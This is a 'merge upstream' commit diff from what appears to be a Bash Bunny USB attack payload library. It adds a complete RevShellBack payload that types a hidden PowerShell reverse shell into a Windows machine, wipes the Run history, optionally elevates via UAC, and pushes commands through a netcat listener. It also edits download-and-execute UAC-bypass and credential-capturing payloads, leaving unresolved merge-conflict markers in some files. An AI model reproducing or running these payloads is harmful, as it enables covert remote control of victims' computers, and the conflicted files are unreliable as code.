merge upstream

payloads/library/execution/RevShellBack/README.md

@@ -0,0 +1,32 @@
+# RevShellBack
+
+- Author: NodePoint
+- Version: 0.1.3
+- Target: Windows
+- Category: Execution
+
+## Description
+
+Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
+
+## Configuration
+
+Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
+<br>
+Need to run as admin? Set the variable ADMIN to true.
+<br>
+Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
+
+## STATUS
+
+| LED      | Status                                    |
+| -------- | ----------------------------------------- |
+| SETUP    | Setup (attackmode, variables, networking) |
+| STAGE1   | Open CMD (bypass UAC if ADMIN is true)    |
+| STAGE2   | Initiate reverse shell                    |
+| SPECIAL1 | Set up listener and send out commands     |
+| FINISH   | Finished                                  |
+
+## Discussion
+
+https://forums.hak5.org/topic/41955-payload-revshellback/

payloads/library/execution/RevShellBack/payload.txt

@@ -0,0 +1,62 @@
+#!/bin/bash
+#
+# Title:         RevShellBack
+# Description:   Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
+# Author:        NodePoint
+# Version:       0.1.3
+# Category:      Execution
+# Target:        Windows
+# Attackmodes:   Ethernet, HID
+
+# Set attack mode
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+# Set variables
+GET HOST_IP
+GET TARGET_HOSTNAME
+# Netcat port number
+NCPORT=4444
+# Delay before attempting to connect to the netcat listener (ms)
+NCDELAY=200
+ADMIN=false
+
+# Setup networking
+echo 1 > /proc/sys/net/ipv4/ip_forward
+iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
+iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
+
+# Open CMD
+LED STAGE1
+if [ "$ADMIN" = true ] ; then
+    # Bypass UAC
+    RUN WIN powershell -c "Start-Process cmd -verb runas"
+    Q DELAY 1500
+    Q ALT Y
+    Q DELAY 300
+    # Hide CMD
+    Q STRING "mode 18,1 & color FE & cd C:\ & title "
+    Q ENTER
+else
+    # Run as normal user
+    RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
+    Q DELAY 150
+fi
+
+# Initiate reverse shell
+LED STAGE2
+Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
+Q ENTER
+
+# Attack -- commands go within EOF
+LED SPECIAL1
+nc -q 0 -l -p $NCPORT <<EOF
+echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
+\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
+calc;
+Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
+EOF
+
+# Done
+ATTACKMODE OFF
+LED FINISH

payloads/library/execution/exe_UACBypassD&E/payload.txt

@@ -2,21 +2,24 @@
 # Author:        Skiddie
 # Version:       1.1
 # Target:        Windows
-# 
+#
 # Download and executes any binary executable with administrator privileges WITHOUT
 # prompting the user for administrator rights (aka UAC bypass/exploit)
-# Please define URL and SAVEFILENAME in the a.vbs script 
+# Please define URL and SAVEFILENAME in the a.vbs script
 # Target does need internet connection
 # Works on Windows 7 - Windows 10
-# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
-# However from what i am aware version 7,8 and 8.1 are still effected 
+# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
+# However from what i am aware version 7,8 and 8.1 are still effected
 # Currently fastest download and execute for HID attacks to date. (with UAC bypass)
 
 #Define your bunny storage stick name
 DRIVER_LABEL='BashBunny'
 
 #RED means starting
-LED R
+LED SETUP
+
+#Gets File locations
+GET SWITCH_POSITION
 
 #We are a keyboard
 ATTACKMODE HID STORAGE
@@ -32,4 +35,3 @@ LED G
 #If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
 #QUACK DELAY 4500
 #shutdown 0
-

payloads/library/execution/psh_DownloadExec/payload.txt

@@ -10,11 +10,15 @@
 #
 # Quick HID attack to retrieve and run powershell payload from BashBunny web server
 # ensure p.txt (your powershell payload) exists in payload directory
+<<<<<<< HEAD
 # 
+=======
+#
+>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
 # | Attack Stage        | Description                              |
 # | ------------------- | ---------------------------------------- |
 # | Stage 1             | Running Initial Powershell Commands      |
-# | Stage 3             | Delivering powershell payload            |
+# | Stage 2             | Delivering powershell payload            |
 #
 
 ATTACKMODE RNDIS_ETHERNET HID
@@ -27,10 +31,17 @@ GET SWITCH_POSITION
 # DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
 SERVER_LOG=/tmp/server.log
+<<<<<<< HEAD
 
 # SERVER LOG
 rm -f ${SERVER_LOG}
 
+=======
+
+# SERVER LOG
+rm -f ${SERVER_LOG}
+
+>>>>>>> f8a442e66dc60ae47c6a4584ccdfcd5b901a386d
 # START HTTP SERVER
 iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
 /tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &

payloads/library/execution/psh_DownloadExec/readme.md

@@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
 | Attack Stage        | Description                              |
 | ------------------- | ---------------------------------------- |
 | Stage 1             | Running Initial Powershell Commands      |
-| Stage 3             | Delivering powershell payload            |
-```
+| Stage 2             | Delivering powershell payload            |
+```

payloads/library/execution/psh_DownloadExecSMB/payload.txt

@@ -13,6 +13,11 @@
 # Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
 # Required tools: impacket 
+=======
+# Credentials captured by  are stored as loot.
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
+#
+# Required tools: impacket
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|

payloads/library/execution/psh_DownloadExecSMB/readme.md

@@ -26,4 +26,4 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
 | Attack Stage        | Description                   |
 | ------------------- | ------------------------------|
 | Stage 1             | Powershell                    |
-| Stage 2             | Delivering powershell payload |
+| Stage 2             | Delivering powershell payload |